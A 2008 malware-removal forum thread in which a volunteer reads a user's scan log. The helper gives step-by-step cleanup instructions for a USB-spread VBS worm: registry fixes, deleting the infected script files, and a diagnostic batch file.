Microsoft -> C:\Documents and Settings\All Users\Application Data\Microsoft ->  [Folder | Modified Date = 5/30/2008 5:57:40 PM | Attr =   S]
QuickTime -> C:\Documents and Settings\All Users\Application Data\QuickTime ->  [Folder | Modified Date = 10/20/2007 10:25:01 PM | Attr =    ]
SiteAdvisor -> C:\Documents and Settings\All Users\Application Data\SiteAdvisor ->  [Folder | Modified Date = 6/4/2008 9:41:11 PM | Attr =    ]
TEMP -> C:\Documents and Settings\All Users\Application Data\TEMP ->  [Folder | Modified Date = 8/24/2008 2:58:38 PM | Attr =    ]
@Alternate Data Stream - 120 bytes -> %AllUsersProfile%\Application Data\TEMP:5C321E34
Viewpoint -> C:\Documents and Settings\All Users\Application Data\Viewpoint ->  [Folder | Modified Date = 11/28/2006 1:10:01 PM | Attr =    ]
WildTangent -> C:\Documents and Settings\All Users\Application Data\WildTangent ->  [Folder | Modified Date = 12/14/2006 10:00:13 PM | Attr =    ]
Windows Genuine Advantage -> C:\Documents and Settings\All Users\Application Data\Windows Genuine Advantage ->  [Folder | Modified Date = 12/24/2006 5:43:45 PM | Attr =    ]
YAHOO -> C:\Documents and Settings\All Users\Application Data\YAHOO ->  [Folder | Modified Date = 11/28/2006 1:17:14 PM | Attr =    ]
Application Data -> C:\Documents and Settings\Tom Jr\Application Data ->  [Folder | Modified Date = 8/23/2008 9:21:37 PM | Attr = RH ]
Adobe -> C:\Documents and Settings\Tom Jr\Application Data\Adobe ->  [Folder | Modified Date = 8/21/2008 10:04:05 PM | Attr =    ]
AdobeUM -> C:\Documents and Settings\Tom Jr\Application Data\AdobeUM ->  [Folder | Modified Date = 7/3/2007 8:55:04 AM | Attr =    ]
AOL -> C:\Documents and Settings\Tom Jr\Application Data\AOL ->  [Folder | Modified Date = 5/23/2008 9:56:40 PM | Attr =    ]
Corel -> C:\Documents and Settings\Tom Jr\Application Data\Corel ->  [Folder | Modified Date = 8/21/2008 6:29:52 PM | Attr =    ]
CyberLink -> C:\Documents and Settings\Tom Jr\Application Data\CyberLink ->  [Folder | Modified Date = 1/11/2008 7:58:28 AM | Attr =    ]
EPSON -> C:\Documents and Settings\Tom Jr\Application Data\EPSON ->  [Folder | Modified Date = 2/17/2008 7:42:34 PM | Attr =    ]
Google -> C:\Documents and Settings\Tom Jr\Application Data\Google ->  [Folder | Modified Date = 2/5/2007 2:59:22 PM | Attr =    ]
Gtek -> C:\Documents and Settings\Tom Jr\Application Data\Gtek ->  [Folder | Modified Date = 11/28/2006 1:19:15 PM | Attr =  H ]
Identities -> C:\Documents and Settings\Tom Jr\Application Data\Identities ->  [Folder | Modified Date = 8/16/2005 3:50:20 AM | Attr =    ]
InstallShield -> C:\Documents and Settings\Tom Jr\Application Data\InstallShield ->  [Folder | Modified Date = 11/28/2006 1:17:47 PM | Attr =    ]
Intel -> C:\Documents and Settings\Tom Jr\Application Data\Intel ->  [Folder | Modified Date = 9/24/2007 9:22:13 AM | Attr =    ]
Leadertech -> C:\Documents and Settings\Tom Jr\Application Data\Leadertech ->  [Folder | Modified Date = 9/11/2007 5:56:58 PM | Attr =    ]
Macromedia -> C:\Documents and Settings\Tom Jr\Application Data\Macromedia ->  [Folder | Modified Date = 11/28/2006 1:13:02 PM | Attr =    ]
Microsoft -> C:\Documents and Settings\Tom Jr\Application Data\Microsoft ->  [Folder | Modified Date = 7/8/2008 12:42:38 AM | Attr =   S]
Mozilla -> C:\Documents and Settings\Tom Jr\Application Data\Mozilla ->  [Folder | Modified Date = 5/23/2008 9:53:08 PM | Attr =    ]
Opera -> C:\Documents and Settings\Tom Jr\Application Data\Opera ->  [Folder | Modified Date = 11/16/2007 11:02:30 PM | Attr =    ]
Real -> C:\Documents and Settings\Tom Jr\Application Data\Real ->  [Folder | Modified Date = 3/16/2008 7:02:33 PM | Attr =    ]
Sonic -> C:\Documents and Settings\Tom Jr\Application Data\Sonic ->  [Folder | Modified Date = 9/11/2007 6:21:31 PM | Attr =    ]
Sun -> C:\Documents and Settings\Tom Jr\Application Data\Sun ->  [Folder | Modified Date = 1/21/2007 10:45:20 PM | Attr =    ]
Talkback -> C:\Documents and Settings\Tom Jr\Application Data\Talkback ->  [Folder | Modified Date = 9/11/2007 9:02:47 PM | Attr =    ]
U3 -> C:\Documents and Settings\Tom Jr\Application Data\U3 ->  [Folder | Modified Date = 8/24/2008 7:11:55 PM | Attr =    ]
Viewpoint -> C:\Documents and Settings\Tom Jr\Application Data\Viewpoint ->  [Folder | Modified Date = 2/18/2007 10:27:56 PM | Attr =    ]
C:\WINDOWS\Tasks\ -> C:\WINDOWS\Tasks ->  [Folder | Modified Date = 8/24/2008 6:37:46 PM | Attr =   S]
desktop.ini -> C:\WINDOWS\Tasks\desktop.ini ->  [Ver =  | Size = 65 bytes | Modified Date = 8/10/2004 4:00:00 AM | Attr = RH ]
MP Scheduled Scan.job -> C:\WINDOWS\Tasks\MP Scheduled Scan.job ->  [Ver =  | Size = 330 bytes | Modified Date = 8/24/2008 6:37:46 PM | Attr =  H ]
SA.DAT -> C:\WINDOWS\Tasks\SA.DAT ->  [Ver =  | Size = 6 bytes | Modified Date = 8/24/2008 6:34:46 PM | Attr =  H ]
[File - Purity Scan: Additional Folder Scans - Non-Microsoft Only]

[CatchMe Rootkit Scan by GMER]
< Windows folder & sub-folders >
scanning hidden processes ...
IPC error: 2 The system cannot find the file specified.
scanning hidden services & system hive ...
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sptd\Cfg]
"s1"=dword:4f43edb1
"s2"=dword:992a06cd
scanning hidden registry entries ...
scanning hidden files ...
C:\WINDOWS\Thumbs.db:encryptable 0 bytes
scan completed successfully
hidden processes: 0
hidden services: 0
hidden files: 2
< Document and Settings folder & sub folders >
scanning hidden files ...
IPC error: 2 The system cannot find the file specified.
C:\Documents and Settings\All Users\Application Data\TEMP:5C321E34 120 bytes
C:\Documents and Settings\All Users\Documents\My Pictures\Impressionism - GalleryPlayer\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\All Users\Documents\My Pictures\Landscapes - GalleryPlayer\ehthumbs.db:encryptable 0 bytes
C:\Documents and Settings\All Users\Documents\My Pictures\Landscapes - GalleryPlayer\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\All Users\Documents\My Pictures\Masterpieces - GalleryPlayer\ehthumbs.db:encryptable 0 bytes
C:\Documents and Settings\All Users\Documents\My Pictures\Masterpieces - GalleryPlayer\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\All Users\Documents\My Pictures\Nature - GalleryPlayer\ehthumbs.db:encryptable 0 bytes
C:\Documents and Settings\All Users\Documents\My Pictures\Nature - GalleryPlayer\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\All Users\Documents\My Pictures\Travel - GalleryPlayer\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\All Users\Documents\My Pictures\Vintage - GalleryPlayer\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\All Users\Documents\My Videos\ehthumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\Desktop\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\Favorites\Diving\Dive Frontier Scuba British dive resort in Puerto Galera, Philippine.url:favicon 1406 bytes
C:\Documents and Settings\Tom Jr\Favorites\Diving\Save Money Diving -- Scuba diving, diving holidays, liveaboards, dive packages worldwide.url:favicon 1406 bytes
C:\Documents and Settings\Tom Jr\Favorites\Diving\ScubaBoard - Scuba Forums, Articles, Dive Buddies, Social Network - Equipment and Travel.url:favicon 1406 bytes
C:\Documents and Settings\Tom Jr\Favorites\India\Cheap flights from India to Bangkok - India Travel Forum  IndiaMike.com.url:favicon 1406 bytes
C:\Documents and Settings\Tom Jr\Favorites\India\India.url:favicon 2038 bytes
C:\Documents and Settings\Tom Jr\Favorites\India\Train travel in India - a beginner's guide.url:favicon 318 bytes
C:\Documents and Settings\Tom Jr\Favorites\Weather\National Weather Service - NWS San Francisco-Monterey Bay Area.url:favicon 1406 bytes
C:\Documents and Settings\Tom Jr\Favorites\Weather\SFOnws.url:favicon 1406 bytes
C:\Documents and Settings\Tom Jr\Local Settings\Application Data\Microsoft\ehome\Image.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\Local Settings\Application Data\Microsoft\ehome\musicThumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\My Documents\My Pictures\Adobe\Digital Camera Photos\2008-07-01-0645-38\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\My Documents\My Pictures\Adobe\Digital Camera Photos\My Vespa\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\My Documents\My Pictures\Adobe\Digital Camera Photos\Pronence 2008\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\My Documents\My Pictures\Christmas and Cruise 2007\ehthumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\My Documents\My Pictures\Christmas and Cruise 2007\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\My Documents\My Pictures\colorado shots\Colorado2\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\My Documents\My Pictures\colorado shots\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\My Documents\My Pictures\Picture\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\My Documents\My Pictures\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\My Documents\My Videos\Experience.mpg:SummaryInformation 352 bytes
C:\Documents and Settings\Tom Jr\My Documents\My Videos\Experience.mpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} 0 bytes
C:\Documents and Settings\Tom Jr\My Documents\My Videos\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\My Documents\PhiIndon2007\813CANON\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\My Documents\PhiIndon2007\814CANON\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\My Documents\PhiIndon2007\815CANON\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\My Documents\PhiIndon2007\816CANON\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Jr\My Documents\PhiIndon2007\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Sr\01mywork-shop\Thumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Sr\Local Settings\Application Data\Microsoft\ehome\Image.db:encryptable 0 bytes
C:\Documents and Settings\Tom Sr\Local Settings\Application Data\Microsoft\ehome\musicThumbs.db:encryptable 0 bytes
C:\Documents and Settings\Tom Sr\Thumbs.db:encryptable 0 bytes
scan completed successfully
hidden files: 52

< End of report >
tboxcar
Active Member
 
Posts: 6
Joined: August 20th, 2008, 9:22 pm

Re: Please view

Unread postby ndmmxiaomayi » August 25th, 2008, 11:47 am

Hello,

I shall have two separate sets of instructions for both your computer and laptop. Please follow the instructions carefully and do not run the wrong fix on the wrong computer.
ndmmxiaomayi
MRU Emeritus
MRU Emeritus
 
Posts: 9708
Joined: July 17th, 2006, 9:22 am

Re: Please view

Unread postby ndmmxiaomayi » August 25th, 2008, 11:50 am

This set of instructions is for your computer.

Step 1

  1. Open My Computer.
  2. Go to Tools > Folder Options.
  3. Select the View tab.
  4. Scroll down to Hidden files and folders.
  5. Select Show hidden files and folders.
  6. Uncheck (untick) Hide extensions of known file types.
  7. Uncheck (untick) Hide protected operating system files (Recommended).
  8. Click Yes when prompted.
  9. Click OK.

Step 2

Please backup your registry before proceeding to any of the steps.

Download ERUNT from Derfisch or MVPS and save it to your desktop.

Please follow Step 4 onwards of the Installing & Using ERUNT to back up your registry. Skip Step 19 for now.

Step 3

Please open Notepad and copy and paste the following in the Code box into Notepad:

Code: Select all
REGEDIT4

[-HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}]


Click on File > Save As....

In the File Name box, copy and paste in fix.reg

In the Save As Type box, select All Files from the drop-down list.

Click Save.

Double click on fix.reg to run it. Windows will prompt if you want to merge this file with the registry. Click Yes.

Step 4

Please delete these files.

C:\sowar.vbs
C:\Radz_Services.vbs

Step 5

Please open a new Notepad file and copy and paste the following in the Code box into Notepad:

Code: Select all
regedit.exe /e C:\mountpoints2.txt "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2"
echo Contents of FIXTOOL folder >> C:\contents.txt
echo. >> C:\contents.txt
dir /a %SystemDrive%\FIXTOOL >> C:\contents.txt
echo. >> C:\contents.txt
echo Contents of remover.bat >> C:\contents.txt
echo. >> C:\contents.txt
type %SystemDrive%\remover.bat >> C:\contents.txt
echo. >> C:\contents.txt
echo Contents of SysRes.vbs >> C:\contents.txt
echo. >> C:\contents.txt
type %SystemRoot%\SysRes.vbs >> C:\contents.txt
echo. >> C:\contents.txt
type C:\mountpoints2.txt >> C:\contents.txt
notepad C:\contents.txt


Click on File > Save As....

In the File Name box, copy and paste in peek.bat

In the Save As Type box, select All Files from the drop-down list.

Click Save.

Double click on peek.bat to run it. Command Prompt will open, followed by Notepad shortly afterwards. Please post the contents of this Notepad file in your next reply.

In your next reply, please post:

  1. A new HijackThis log
  2. Contents of Notepad file that opens from Step 5 (C:\contents.txt)
ndmmxiaomayi
MRU Emeritus
MRU Emeritus
 
Posts: 9708
Joined: July 17th, 2006, 9:22 am

Re: Please view

Unread postby ndmmxiaomayi » August 25th, 2008, 11:56 am

This second set of instructions is for your laptop.

Step 1

  1. Please download Flash_Disinfector and save it to your desktop.
  2. Double click to run it.
  3. You will be prompted to plug in your flash drive. Plug it in.
  4. Flash_Disinfector will start disinfecting your flash and hard drives. This takes a few seconds. Your desktop will disappear in the meantime.
  5. When done, a message box will appear. Click OK. Your desktop should now appear. If it doesn't, press Ctrl + Shift + Esc to open Task Manager.
  6. Click on File > New Task (Run...). Type in explorer.exe and press Enter. Your desktop should now appear.

Step 2

  1. Open My Computer.
  2. Go to Tools > Folder Options.
  3. Select the View tab.
  4. Scroll down to Hidden files and folders.
  5. Select Show hidden files and folders.
  6. Uncheck (untick) Hide extensions of known file types.
  7. Uncheck (untick) Hide protected operating system files (Recommended).
  8. Click Yes when prompted.
  9. Click OK.

Step 3

Please backup your registry before proceeding to any of the steps.

Download ERUNT from Derfisch or MVPS and save it to your desktop.

Please follow Step 4 onwards of the Installing & Using ERUNT to back up your registry. Skip Step 19 for now.

Step 4

Please open Notepad and copy and paste the following in the Code box into Notepad:

Code: Select all
REGEDIT4

[-HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}]

[-HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.google.com/"


Click on File > Save As....

In the File Name box, copy and paste in fix.reg

In the Save As Type box, select All Files from the drop-down list.

Click Save.

Double click on fix.reg to run it. Windows will prompt if you want to merge this file with the registry. Click Yes.

Step 5

Please plug in your Western Digital Passport Drive and delete this file if present - sowar.vbs

Next...

Please delete these files.

C:\sowar.vbs
C:\Radz_Services.vbs

If you have more than one USB drives, you need to delete all sowar.vbs found.

Step 6

Please open a new Notepad file and copy and paste the following in the Code box into Notepad:

Code: Select all
regedit.exe /e C:\mountpoints2.txt "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2"
notepad C:\mountpoints2.txt


Click on File > Save As....

In the File Name box, copy and paste in peek.bat

In the Save As Type box, select All Files from the drop-down list.

Click Save.

Double click on peek.bat to run it. Command Prompt will open, followed by Notepad shortly afterwards. Please post the contents of this Notepad file in your next reply.

I have a feeling its in my WD Passport hard drive, is this considered a USB drive?


Yes to both of your questions. It spreads by USB drives. The moment you plug in your USB drive and Windows runs it, you will be infected.

In your next reply, please post:

  1. A new HijackThis log
  2. Contents of Notepad file which opens (C:\mountpoints2.txt)
ndmmxiaomayi
MRU Emeritus
MRU Emeritus
 
Posts: 9708
Joined: July 17th, 2006, 9:22 am

Re: Please view

Unread postby NonSuch » August 30th, 2008, 3:22 am

Due to lack of response, this topic is now closed.

If you still require help, please open a new thread in the Infected? Virus, malware, adware, ransomware, oh my! forum, include a fresh FRST log, and wait for a new helper.
User avatar
NonSuch
Administrator
Administrator
 
Posts: 27300
Joined: February 23rd, 2005, 7:08 am
Location: California
Advertisement
Register to Remove


  • Similar Topics
    Replies
    Views
    Last post

Return to Infected? Virus, malware, adware, ransomware, oh my!



Who is online

Users browsing this forum: No registered users and 54 guests

Contact us:

Advertisements do not imply our endorsement of that product or service. Register to remove all ads. The forum is run by volunteers who donate their time and expertise. We make every attempt to ensure that the help and advice posted is accurate and will not cause harm to your computer. However, we do not guarantee that they are accurate and they are to be used at your own risk. All trademarks are the property of their respective owners.

Member site: UNITE Against Malware